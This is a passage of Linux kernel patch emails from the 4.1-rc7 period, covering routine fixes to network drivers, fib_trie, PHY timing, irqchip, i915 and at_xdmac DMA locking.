was also missing in the error paths of b44_init_one(). Signed-off-by: Hauke Mehrtens Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/b44.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/broadcom/b44.c b/drivers/net/ethernet/broadcom/b44.c index 77363d680532..a3b1c07ae0af 100644 --- a/drivers/net/ethernet/broadcom/b44.c +++ b/drivers/net/ethernet/broadcom/b44.c @@ -2464,6 +2464,7 @@ static int b44_init_one(struct ssb_device *sdev, ssb_bus_may_powerdown(sdev->bus); err_out_free_dev: + netif_napi_del(&bp->napi); free_netdev(dev); out: @@ -2480,6 +2481,7 @@ static void b44_remove_one(struct ssb_device *sdev) b44_unregister_phy_one(bp); ssb_device_disable(sdev, 0); ssb_bus_may_powerdown(sdev->bus); + netif_napi_del(&bp->napi); free_netdev(dev); ssb_pcihost_set_power_state(sdev, PCI_D3hot); ssb_set_drvdata(sdev, NULL); From 7cf7fa529d0b6b514949cc67b39e3ce406c37006 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Sun, 7 Jun 2015 15:44:23 +0300 Subject: [PATCH 764/872] net/mlx5_core: Fix static checker warnings around system guid query flow Fix static checker warnings in the flow of system guid query. Fixes: 707c4602cda6 ('net/mlx5_core: Add new query HCA vport commands') Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 3 ++- drivers/net/ethernet/mellanox/mlx5/core/vport.c | 2 +- include/linux/mlx5/vport.h | 2 +- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index ba87442ef776..9335e5ae18cc 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -35,7 +35,8 @@ #include #include "mlx5_core.h" -int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev, u32 *out, int outlen) +static int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev, u32 *out, + int outlen) { u32 in[MLX5_ST_SZ_DW(query_adapter_in)]; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c index 20150ffa8b16..b94177ebcf3a 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -307,7 +307,7 @@ int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_context); int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, - __be64 *sys_image_guid) + u64 *sys_image_guid) { struct mlx5_hca_vport_context *rep; int err; diff --git a/include/linux/mlx5/vport.h b/include/linux/mlx5/vport.h index 67882a834efb..967e0fd06e89 100644 --- a/include/linux/mlx5/vport.h +++ b/include/linux/mlx5/vport.h @@ -48,7 +48,7 @@ int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, u16 vf_num, struct mlx5_hca_vport_context *rep); int mlx5_query_hca_vport_system_image_guid(struct mlx5_core_dev *dev, - __be64 *sys_image_guid); + u64 *sys_image_guid); int mlx5_query_hca_vport_node_guid(struct mlx5_core_dev *dev, u64 *node_guid); From d4a4f75cd8f29cd9464a5a32e9224a91571d6649 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 7 Jun 2015 20:23:50 -0700 Subject: [PATCH 765/872] Linux 4.1-rc7 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index aee7e5cb4c15..40a8b068ac26 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc6 +EXTRAVERSION = -rc7 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From fb79c066bce8620fae04112b33c55f279b60d3e1 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sat, 6 Jun 2015 09:51:51 +0200 Subject: [PATCH 766/872] cosa: use msecs_to_jiffies for conversions API compliance scanning with coccinelle flagged: ./drivers/net/wan/cosa.c:520:2-18: WARNING: timeout (30) seems HZ dependent Numeric constants passed to schedule_timeout() make the effective timeout HZ dependent which makes little sense in a device probe. Fixed up by converting the constant to jiffies with msecs_to_jiffies() Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/net/wan/cosa.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wan/cosa.c b/drivers/net/wan/cosa.c index bcfa01add7cc..7193b7304fdd 100644 --- a/drivers/net/wan/cosa.c +++ b/drivers/net/wan/cosa.c @@ -517,7 +517,7 @@ static int cosa_probe(int base, int irq, int dma) */ set_current_state(TASK_INTERRUPTIBLE); cosa_putstatus(cosa, SR_TX_INT_ENA); - schedule_timeout(30); + schedule_timeout(msecs_to_jiffies(300)); irq = probe_irq_off(irqs); /* Disable all IRQs from the card */ cosa_putstatus(cosa, 0); From cbab1510afbb140f7a51d996eafc525ac316c667 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sun, 7 Jun 2015 12:35:46 +0200 Subject: [PATCH 767/872] wan: dscc4: use msecs_to_jiffies for conversions API compliance scanning with coccinelle flagged: ./drivers/net/wan/dscc4.c:1036:1-33: WARNING: timeout (10) seems HZ dependent ./drivers/net/wan/dscc4.c:554:2-34: WARNING: timeout (10) seems HZ dependent ./drivers/net/wan/dscc4.c:599:2-34: WARNING: timeout (10) seems HZ dependent Numeric constants passed to schedule_timeout_*() make the effective timeout HZ dependent which does not seem to be the intent here. Fixed up by converting the constant to jiffies with msecs_to_jiffies(), passing 100ms (assuming HZ==100 in the original code). Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/net/wan/dscc4.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wan/dscc4.c b/drivers/net/wan/dscc4.c index f76845de7aa8..7a72407208b1 100644 --- a/drivers/net/wan/dscc4.c +++ b/drivers/net/wan/dscc4.c @@ -551,7 +551,7 @@ static int dscc4_wait_ack_cec(struct dscc4_dev_priv *dpriv, msg, i); goto done; } - schedule_timeout_uninterruptible(10); + schedule_timeout_uninterruptible(msecs_to_jiffies(100)); rmb(); } while (++i > 0); netdev_err(dev, "%s timeout\n", msg); @@ -596,7 +596,7 @@ static inline int dscc4_xpr_ack(struct dscc4_dev_priv *dpriv) (dpriv->iqtx[cur] & cpu_to_le32(Xpr))) break; smp_rmb(); - schedule_timeout_uninterruptible(10); + schedule_timeout_uninterruptible(msecs_to_jiffies(100)); } while (++i > 0); return (i >= 0 ) ? i : -EAGAIN; @@ -1033,7 +1033,7 @@ static void dscc4_pci_reset(struct pci_dev *pdev, void __iomem *ioaddr) /* Flush posted writes */ readl(ioaddr + GSTAR); - schedule_timeout_uninterruptible(10); + schedule_timeout_uninterruptible(msecs_to_jiffies(100)); for (i = 0; i < 16; i++) pci_write_config_dword(pdev, i << 2, dscc4_pci_config_store[i]); From f38b24c90528c888915ef6e3bc320bdb30b14cf2 Mon Sep 17 00:00:00 2001 From: Firo Yang Date: Mon, 8 Jun 2015 11:54:51 +0800 Subject: [PATCH 768/872] fib_trie: coding style: Use pointer after check As Alexander Duyck pointed out that: struct tnode { ... struct key_vector kv[1]; } The kv[1] member of struct tnode is an arry that refernced by a null pointer will not crash the system, like this: struct tnode *p = NULL; struct key_vector *kv = p->kv; As such p->kv doesn't actually dereference anything, it is simply a means for getting the offset to the array from the pointer p. This patch make the code more regular to avoid making people feel odd when they look at the code. Signed-off-by: Firo Yang Signed-off-by: David S. Miller --- net/ipv4/fib_trie.c | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c index 01bce1506cd7..3c699c4e90a4 100644 --- a/net/ipv4/fib_trie.c +++ b/net/ipv4/fib_trie.c @@ -325,13 +325,15 @@ static inline void empty_child_dec(struct key_vector *n) static struct key_vector *leaf_new(t_key key, struct fib_alias *fa) { - struct tnode *kv = kmem_cache_alloc(trie_leaf_kmem, GFP_KERNEL); - struct key_vector *l = kv->kv; + struct key_vector *l; + struct tnode *kv; + kv = kmem_cache_alloc(trie_leaf_kmem, GFP_KERNEL); if (!kv) return NULL; /* initialize key vector */ + l = kv->kv; l->key = key; l->pos = 0; l->bits = 0; @@ -346,24 +348,26 @@ static struct key_vector *leaf_new(t_key key, struct fib_alias *fa) static struct key_vector *tnode_new(t_key key, int pos, int bits) { - struct tnode *tnode = tnode_alloc(bits); unsigned int shift = pos + bits; - struct key_vector *tn = tnode->kv; + struct key_vector *tn; + struct tnode *tnode; /* verify bits and pos their msb bits clear and values are valid */ BUG_ON(!bits || (shift > KEYLENGTH)); - pr_debug("AT %p s=%zu %zu\n", tnode, TNODE_SIZE(0), - sizeof(struct key_vector *) << bits); - + tnode = tnode_alloc(bits); if (!tnode) return NULL; + pr_debug("AT %p s=%zu %zu\n", tnode, TNODE_SIZE(0), + sizeof(struct key_vector *) << bits); + if (bits == KEYLENGTH) tnode->full_children = 1; else tnode->empty_children = 1ul << bits; + tn = tnode->kv; tn->key = (shift < KEYLENGTH) ? (key >> shift) << shift : 0; tn->pos = pos; tn->bits = bits; @@ -2054,11 +2058,12 @@ static struct key_vector *fib_trie_get_next(struct fib_trie_iter *iter) static struct key_vector *fib_trie_get_first(struct fib_trie_iter *iter, struct trie *t) { - struct key_vector *n, *pn = t->kv; + struct key_vector *n, *pn; if (!t) return NULL; + pn = t->kv; n = rcu_dereference(pn->tnode[0]); if (!n) return NULL; From 3c9a9f7fb0eee8a29cb64dfbdaef25efed17e22c Mon Sep 17 00:00:00 2001 From: Jaeden Amero Date: Fri, 5 Jun 2015 18:00:24 -0500 Subject: [PATCH 769/872] net/phy: micrel: Be more const correct In a few places in this driver, we weren't using const where we could have. Use const more. In addition, change the arrays of strings in ksz9031_config_init() to be not only const, but also static. Signed-off-by: Jaeden Amero Signed-off-by: David S. Miller --- drivers/net/phy/micrel.c | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c index ebdc357c5131..59cc5d4df621 100644 --- a/drivers/net/phy/micrel.c +++ b/drivers/net/phy/micrel.c @@ -288,9 +288,10 @@ static int kszphy_config_init(struct phy_device *phydev) } static int ksz9021_load_values_from_of(struct phy_device *phydev, - struct device_node *of_node, u16 reg, - char *field1, char *field2, - char *field3, char *field4) + const struct device_node *of_node, + u16 reg, + const char *field1, const char *field2, + const char *field3, const char *field4) { int val1 = -1; int val2 = -2; @@ -336,8 +337,8 @@ static int ksz9021_load_values_from_of(struct phy_device *phydev, static int ksz9021_config_init(struct phy_device *phydev) { - struct device *dev = &phydev->dev; - struct device_node *of_node = dev->of_node; + const struct device *dev = &phydev->dev; + const struct device_node *of_node = dev->of_node; if (!of_node && dev->parent->of_node) of_node = dev->parent->of_node; @@ -389,9 +390,9 @@ static int ksz9031_extended_read(struct phy_device *phydev, } static int ksz9031_of_load_skew_values(struct phy_device *phydev, - struct device_node *of_node, + const struct device_node *of_node, u16 reg, size_t field_sz, - char *field[], u8 numfields) + const char *field[], u8 numfields) { int val[4] = {-1, -2, -3, -4}; int matches = 0; @@ -427,18 +428,18 @@ static int ksz9031_of_load_skew_values(struct phy_device *phydev, static int ksz9031_config_init(struct phy_device *phydev) { - struct device *dev = &phydev->dev; - struct device_node *of_node = dev->of_node; - char *clk_skews[2] = {"rxc-skew-ps", "txc-skew-ps"}; - char *rx_data_skews[4] = { + const struct device *dev = &phydev->dev; + const struct device_node *of_node = dev->of_node; + static const char *clk_skews[2] = {"rxc-skew-ps", "txc-skew-ps"}; + static const char *rx_data_skews[4] = { "rxd0-skew-ps", "rxd1-skew-ps", "rxd2-skew-ps", "rxd3-skew-ps" }; - char *tx_data_skews[4] = { + static const char *tx_data_skews[4] = { "txd0-skew-ps", "txd1-skew-ps", "txd2-skew-ps", "txd3-skew-ps" }; - char *control_skews[2] = {"txen-skew-ps", "rxdv-skew-ps"}; + static const char *control_skews[2] = {"txen-skew-ps", "rxdv-skew-ps"}; if (!of_node && dev->parent->of_node) of_node = dev->parent->of_node; @@ -519,7 +520,7 @@ ksz9021_wr_mmd_phyreg(struct phy_device *phydev, int ptrad, int devnum, static int kszphy_probe(struct phy_device *phydev) { const struct kszphy_type *type = phydev->drv->driver_data; - struct device_node *np = phydev->dev.of_node; + const struct device_node *np = phydev->dev.of_node; struct kszphy_priv *priv; struct clk *clk; int ret; From ae6c97bb096df970c8e8095fcc84143a01fa02f2 Mon Sep 17 00:00:00 2001 From: Jaeden Amero Date: Fri, 5 Jun 2015 18:00:25 -0500 Subject: [PATCH 770/872] net/phy: micrel: Comment MMD address of extended registers There are some defines for a few pad skew related extended registers. Specify for which MMD Address (dev_addr) they are for. Signed-off-by: Jaeden Amero Signed-off-by: David S. Miller --- drivers/net/phy/micrel.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c index 59cc5d4df621..f23765ea6f65 100644 --- a/drivers/net/phy/micrel.c +++ b/drivers/net/phy/micrel.c @@ -366,6 +366,7 @@ static int ksz9021_config_init(struct phy_device *phydev) #define KSZ9031_PS_TO_REG 60 /* Extended registers */ +/* MMD Address 0x2 */ #define MII_KSZ9031RN_CONTROL_PAD_SKEW 4 #define MII_KSZ9031RN_RX_DATA_PAD_SKEW 5 #define MII_KSZ9031RN_TX_DATA_PAD_SKEW 6 From 6270e1ae804ae781cdd3cc20eadfa4b6fb090ab7 Mon Sep 17 00:00:00 2001 From: Jaeden Amero Date: Fri, 5 Jun 2015 18:00:26 -0500 Subject: [PATCH 771/872] net/phy: micrel: Center FLP timing at 16ms Link failures have been observed when using the KSZ9031 with HP 1810-8G and HP 1910-8G network switches. Center the FLP timing at 16ms to help avoid intermittent link failures. >From the KSZ9031RNX and KSZ9031MNX data sheets revision 2.2, section "Auto-Negotiation Timing": The KSZ9031[RNX or MNX] Fast Link Pulse (FLP) burst-to-burst transmit timing for Auto-Negotiation defaults to 8ms. IEEE 802.3 Standard specifies this timing to be 16ms +/-8ms. Some PHY link partners need to receive the FLP with 16ms centered timing; otherwise, there can be intermittent link failures and long link-up times. The PHY data sheet recommends configuring the FLP burst registers after power-up/reset and immediately thereafter restarting auto-negotiation, so we center the FLP timing at 16ms and then restart auto-negotiation in the config_init for KSZ9031. Signed-off-by: Jaeden Amero Signed-off-by: David S. Miller --- drivers/net/phy/micrel.c | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c index f23765ea6f65..499185eaf413 100644 --- a/drivers/net/phy/micrel.c +++ b/drivers/net/phy/micrel.c @@ -366,6 +366,10 @@ static int ksz9021_config_init(struct phy_device *phydev) #define KSZ9031_PS_TO_REG 60 /* Extended registers */ +/* MMD Address 0x0 */ +#define MII_KSZ9031RN_FLP_BURST_TX_LO 3 +#define MII_KSZ9031RN_FLP_BURST_TX_HI 4 + /* MMD Address 0x2 */ #define MII_KSZ9031RN_CONTROL_PAD_SKEW 4 #define MII_KSZ9031RN_RX_DATA_PAD_SKEW 5 @@ -427,6 +431,22 @@ static int ksz9031_of_load_skew_values(struct phy_device *phydev, return ksz9031_extended_write(phydev, OP_DATA, 2, reg, newval); } +static int ksz9031_center_flp_timing(struct phy_device *phydev) +{ + int result; + + /* Center KSZ9031RNX FLP timing at 16ms. */ + result = ksz9031_extended_write(phydev, OP_DATA, 0, + MII_KSZ9031RN_FLP_BURST_TX_HI, 0x0006); + result = ksz9031_extended_write(phydev, OP_DATA, 0, + MII_KSZ9031RN_FLP_BURST_TX_LO, 0x1A80); + + if (result) + return result; + + return genphy_restart_aneg(phydev); +} + static int ksz9031_config_init(struct phy_device *phydev) { const struct device *dev = &phydev->dev; @@ -462,7 +482,8 @@ static int ksz9031_config_init(struct phy_device *phydev) MII_KSZ9031RN_TX_DATA_PAD_SKEW, 4, tx_data_skews, 4); } - return 0; + + return ksz9031_center_flp_timing(phydev); } #define KSZ8873MLL_GLOBAL_CONTROL_4 0x06 From febe06962ab191db50e633a0f79d9fb89a2d1078 Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Sun, 7 Jun 2015 21:33:29 +0800 Subject: [PATCH 772/872] irqchip: sunxi-nmi: Fix off-by-one error in irq iterator Fixes: 6058bb362818 'ARM: sun7i/sun6i: irqchip: Add irqchip driver for NMI controller' Signed-off-by: Axel Lin Cc: Maxime Ripard Cc: Carlo Caione Cc: Jason Cooper Cc: stable@vger.kernel.org Link: http://lkml.kernel.org/r/1433684009.9134.1.camel@ingics.com Signed-off-by: Thomas Gleixner --- drivers/irqchip/irq-sunxi-nmi.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/irqchip/irq-sunxi-nmi.c b/drivers/irqchip/irq-sunxi-nmi.c index 4a9ce5b50c5b..6b2b582433bd 100644 --- a/drivers/irqchip/irq-sunxi-nmi.c +++ b/drivers/irqchip/irq-sunxi-nmi.c @@ -104,7 +104,7 @@ static int sunxi_sc_nmi_set_type(struct irq_data *data, unsigned int flow_type) irqd_set_trigger_type(data, flow_type); irq_setup_alt_chip(data, flow_type); - for (i = 0; i <= gc->num_ct; i++, ct++) + for (i = 0; i < gc->num_ct; i++, ct++) if (ct->type & flow_type) ctrl_off = ct->regs.type; From 4710f2facb5c68d629015747bd09b37203e0d137 Mon Sep 17 00:00:00 2001 From: Aaro Koskinen Date: Mon, 8 Jun 2015 11:32:43 +0300 Subject: [PATCH 773/872] pata_octeon_cf: fix broken build MODULE_DEVICE_TABLE is referring to wrong driver's table and breaks the build. Fix that. Cc: stable@vger.kernel.org Signed-off-by: Aaro Koskinen Signed-off-by: Tejun Heo --- drivers/ata/pata_octeon_cf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/ata/pata_octeon_cf.c b/drivers/ata/pata_octeon_cf.c index 80a80548ad0a..27245957eee3 100644 --- a/drivers/ata/pata_octeon_cf.c +++ b/drivers/ata/pata_octeon_cf.c @@ -1053,7 +1053,7 @@ static struct of_device_id octeon_cf_match[] = { }, {}, }; -MODULE_DEVICE_TABLE(of, octeon_i2c_match); +MODULE_DEVICE_TABLE(of, octeon_cf_match); static struct platform_driver octeon_cf_driver = { .probe = octeon_cf_probe, From 3b7e5c7e36ed4a046bbea6d36c9be9d1d6107ae0 Mon Sep 17 00:00:00 2001 From: Jurgen Kramer Date: Fri, 5 Jun 2015 09:42:49 +0200 Subject: [PATCH 774/872] ALSA: usb-audio: add native DSD support for JLsounds I2SoverUSB This patch adds native DSD support for the XMOS based JLsounds I2SoverUSB board Signed-off-by: Jurgen Kramer Cc: Signed-off-by: Takashi Iwai --- sound/usb/quirks.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c index b8c97d092a47..754e689596a2 100644 --- a/sound/usb/quirks.c +++ b/sound/usb/quirks.c @@ -1267,8 +1267,9 @@ u64 snd_usb_interface_dsd_format_quirks(struct snd_usb_audio *chip, if (fp->altsetting == 2) return SNDRV_PCM_FMTBIT_DSD_U32_BE; break; - /* DIYINHK DSD DXD 384kHz USB to I2S/DSD */ - case USB_ID(0x20b1, 0x2009): + + case USB_ID(0x20b1, 0x2009): /* DIYINHK DSD DXD 384kHz USB to I2S/DSD */ + case USB_ID(0x20b1, 0x2023): /* JLsounds I2SoverUSB */ if (fp->altsetting == 3) return SNDRV_PCM_FMTBIT_DSD_U32_BE; break; From 8ce7da474f3063f57ac446eb428945a9852e102d Mon Sep 17 00:00:00 2001 From: Ander Conselvan de Oliveira Date: Mon, 8 Jun 2015 11:26:30 +0300 Subject: [PATCH 775/872] drm/i915: Properly initialize SDVO analog connectors In the commit below, I missed the connector allocation in the function intel_sdvo_analog_init(), leading to those connectors to have a NULL state pointer. commit 08d9bc920d465bbbbd762cac9383249c19bf69a2 Author: Ander Conselvan de Oliveira Date: Fri Apr 10 10:59:10 2015 +0300 drm/i915: Allocate connector state together with the connectors Reported-by: Stefan Lippers-Hollmann Tested-by: Stefan Lippers-Hollmann Signed-off-by: Ander Conselvan de Oliveira Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_sdvo.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/i915/intel_sdvo.c b/drivers/gpu/drm/i915/intel_sdvo.c index e87d2f418de4..987b81f31b0e 100644 --- a/drivers/gpu/drm/i915/intel_sdvo.c +++ b/drivers/gpu/drm/i915/intel_sdvo.c @@ -2550,7 +2550,7 @@ intel_sdvo_analog_init(struct intel_sdvo *intel_sdvo, int device) DRM_DEBUG_KMS("initialising analog device %d\n", device); - intel_sdvo_connector = kzalloc(sizeof(*intel_sdvo_connector), GFP_KERNEL); + intel_sdvo_connector = intel_sdvo_connector_alloc(); if (!intel_sdvo_connector) return false; From 4c374fc7ce944024936a6d9804daec85207d9384 Mon Sep 17 00:00:00 2001 From: Ludovic Desroches Date: Mon, 8 Jun 2015 10:33:14 +0200 Subject: [PATCH 776/872] dmaengine: at_xdmac: lock fixes Using _bh variant for spin locks causes this kind of warning: Starting logging: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 3 at /ssd_drive/linux/kernel/softirq.c:151 __local_bh_enable_ip+0xe8/0xf4() Modules linked in: CPU: 0 PID: 3 Comm: ksoftirqd/0 Not tainted 4.1.0-rc2+ #94 Hardware name: Atmel SAMA5 [] (unwind_backtrace) from [] (show_stack+0x10/0x14) [] (show_stack) from [] (warn_slowpath_common+0x80/0xac) [] (warn_slowpath_common) from [] (warn_slowpath_null+0x1c/0x24) [] (warn_slowpath_null) from [] (__local_bh_enable_ip+0xe8/0xf4) [] (__local_bh_enable_ip) from [] (at_xdmac_device_terminate_all+0xf4/0x100) [] (at_xdmac_device_terminate_all) from [] (atmel_complete_tx_dma+0x34/0xf4) [] (atmel_complete_tx_dma) from [] (at_xdmac_tasklet+0x14c/0x1ac) [] (at_xdmac_tasklet) from [] (tasklet_action+0x68/0xb4) [] (tasklet_action) from [] (__do_softirq+0xfc/0x238) [] (__do_softirq) from [] (run_ksoftirqd+0x28/0x34) [] (run_ksoftirqd) from [] (smpboot_thread_fn+0x138/0x18c) [] (smpboot_thread_fn) from [] (kthread+0xdc/0xf0) [] (kthread) from [] (ret_from_fork+0x14/0x34) ---[ end trace b57b14a99c1d8812 ]--- It comes from the fact that devices can called some code from the DMA controller with irq disabled. _bh variant is not intended to be used in this case since it can enable irqs. Switch to irqsave/irqrestore variant to avoid this situation. Signed-off-by: Ludovic Desroches Cc: stable@vger.kernel.org # 4.0 and later Signed-off-by: Vinod Koul --- drivers/dma/at_xdmac.c | 75 ++++++++++++++++++++++++------------------ 1 file changed, 43 insertions(+), 32 deletions(-) diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c index 933e4b338459..0dcc9a7a90af 100644 --- a/drivers/dma/at_xdmac.c +++ b/drivers/dma/at_xdmac.c @@ -415,8 +415,9 @@ static dma_cookie_t at_xdmac_tx_submit(struct dma_async_tx_descriptor *tx) struct at_xdmac_desc *desc = txd_to_at_desc(tx); struct at_xdmac_chan *atchan = to_at_xdmac_chan(tx->chan); dma_cookie_t cookie; + unsigned long irqflags; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); cookie = dma_cookie_assign(tx); dev_vdbg(chan2dev(tx->chan), "%s: atchan 0x%p, add desc 0x%p to xfers_list\n", @@ -425,7 +426,7 @@ static dma_cookie_t at_xdmac_tx_submit(struct dma_async_tx_descriptor *tx) if (list_is_singular(&atchan->xfers_list)) at_xdmac_start_xfer(atchan, desc); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); return cookie; } @@ -563,6 +564,8 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, struct scatterlist *sg; int i; unsigned int xfer_size = 0; + unsigned long irqflags; + struct dma_async_tx_descriptor *ret = NULL; if (!sgl) return NULL; @@ -578,7 +581,7 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, flags); /* Protect dma_sconfig field that can be modified by set_slave_conf. */ - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); /* Prepare descriptors. */ for_each_sg(sgl, sg, sg_len, i) { @@ -589,8 +592,7 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, mem = sg_dma_address(sg); if (unlikely(!len)) { dev_err(chan2dev(chan), "sg data length is zero\n"); - spin_unlock_bh(&atchan->lock); - return NULL; + goto spin_unlock; } dev_dbg(chan2dev(chan), "%s: * sg%d len=%u, mem=0x%08x\n", __func__, i, len, mem); @@ -600,8 +602,7 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, dev_err(chan2dev(chan), "can't get descriptor\n"); if (first) list_splice_init(&first->descs_list, &atchan->free_descs_list); - spin_unlock_bh(&atchan->lock); - return NULL; + goto spin_unlock; } /* Linked list descriptor setup. */ @@ -645,13 +646,15 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, xfer_size += len; } - spin_unlock_bh(&atchan->lock); first->tx_dma_desc.flags = flags; first->xfer_size = xfer_size; first->direction = direction; + ret = &first->tx_dma_desc; - return &first->tx_dma_desc; +spin_unlock: + spin_unlock_irqrestore(&atchan->lock, irqflags); + return ret; } static struct dma_async_tx_descriptor * @@ -664,6 +667,7 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, struct at_xdmac_desc *first = NULL, *prev = NULL; unsigned int periods = buf_len / period_len; int i; + unsigned long irqflags; dev_dbg(chan2dev(chan), "%s: buf_addr=%pad, buf_len=%zd, period_len=%zd, dir=%s, flags=0x%lx\n", __func__, &buf_addr, buf_len, period_len, @@ -682,16 +686,16 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, for (i = 0; i < periods; i++) { struct at_xdmac_desc *desc = NULL; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); desc = at_xdmac_get_desc(atchan); if (!desc) { dev_err(chan2dev(chan), "can't get descriptor\n"); if (first) list_splice_init(&first->descs_list, &atchan->free_descs_list); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); return NULL; } - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); dev_dbg(chan2dev(chan), "%s: desc=0x%p, tx_dma_desc.phys=%pad\n", __func__, desc, &desc->tx_dma_desc.phys); @@ -766,6 +770,7 @@ at_xdmac_prep_dma_memcpy(struct dma_chan *chan, dma_addr_t dest, dma_addr_t src, | AT_XDMAC_CC_SIF(0) | AT_XDMAC_CC_MBSIZE_SIXTEEN | AT_XDMAC_CC_TYPE_MEM_TRAN; + unsigned long irqflags; dev_dbg(chan2dev(chan), "%s: src=%pad, dest=%pad, len=%zd, flags=0x%lx\n", __func__, &src, &dest, len, flags); @@ -798,9 +803,9 @@ at_xdmac_prep_dma_memcpy(struct dma_chan *chan, dma_addr_t dest, dma_addr_t src, dev_dbg(chan2dev(chan), "%s: remaining_size=%zu\n", __func__, remaining_size); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); desc = at_xdmac_get_desc(atchan); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); if (!desc) { dev_err(chan2dev(chan), "can't get descriptor\n"); if (first) @@ -886,6 +891,7 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, int residue; u32 cur_nda, mask, value; u8 dwidth = 0; + unsigned long flags; ret = dma_cookie_status(chan, cookie, txstate); if (ret == DMA_COMPLETE) @@ -894,7 +900,7 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, if (!txstate) return ret; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); desc = list_first_entry(&atchan->xfers_list, struct at_xdmac_desc, xfer_node); @@ -904,8 +910,7 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, */ if (!desc->active_xfer) { dma_set_residue(txstate, desc->xfer_size); - spin_unlock_bh(&atchan->lock); - return ret; + goto spin_unlock; } residue = desc->xfer_size; @@ -936,14 +941,14 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, } residue += at_xdmac_chan_read(atchan, AT_XDMAC_CUBC) << dwidth; - spin_unlock_bh(&atchan->lock); - dma_set_residue(txstate, residue); dev_dbg(chan2dev(chan), "%s: desc=0x%p, tx_dma_desc.phys=%pad, tx_status=%d, cookie=%d, residue=%d\n", __func__, desc, &desc->tx_dma_desc.phys, ret, cookie, residue); +spin_unlock: + spin_unlock_irqrestore(&atchan->lock, flags); return ret; } @@ -964,8 +969,9 @@ static void at_xdmac_remove_xfer(struct at_xdmac_chan *atchan, static void at_xdmac_advance_work(struct at_xdmac_chan *atchan) { struct at_xdmac_desc *desc; + unsigned long flags; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); /* * If channel is enabled, do nothing, advance_work will be triggered @@ -980,7 +986,7 @@ static void at_xdmac_advance_work(struct at_xdmac_chan *atchan) at_xdmac_start_xfer(atchan, 